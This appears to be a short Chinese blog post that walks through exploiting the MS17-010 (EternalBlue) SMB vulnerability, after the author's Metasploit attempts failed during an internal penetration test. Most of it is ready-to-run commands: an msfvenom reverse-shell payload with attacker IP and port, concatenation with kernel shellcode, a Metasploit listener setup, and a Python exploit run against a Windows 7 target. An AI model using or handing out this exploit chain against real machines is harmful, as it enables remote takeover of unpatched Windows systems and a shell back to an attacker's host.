前言

    才想起来自己还有个博客，草率了

    原因：前段时间去做某个公司的内网渗透(打酱油的)，内网中扫出了很多的MS17-010，但是msf一直打不成功 5和6的版本都试了就是不行，一度以为机器上的某个杀软打的虚拟补丁，最后小伙伴用这个py脚本打成功了，还是太相信msf了，据说有大佬用msf打ms17-010打了一个月才成功。。。。

进入正题

贴上gaylab项目地址：https://github.com/338317/MS17-010

kali：192.168.149.167

win7：192.168.149.140

过程如下：

生成msf的payload:
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=192.168.149.167 LPORT=4456

将生成的shellcode与提供的文件组成完整的shellcode：
cat eternalblue_kshellcode_x64.asm shell_msf.bin >>reverse_shell.bin

kali上设置监听：
use exploit/multi/handler
set payload windows/x64/shell/reverse_tcp(与上面生成shellcode的一样)
set EXITFUNC thread
set lhost 192.168.149.167
ste lport 4456
run

启动程序：
python eternalblue_exploit7.py 192.168.149.140 reverse_shell.bin
ps：eternalblue_exploit7用于低版本的windows，如:Windows 7/2008，eternalblue_exploit8用于高版本的windows，如:Windows 8/2012

成功率比较高，当然“小心蓝屏”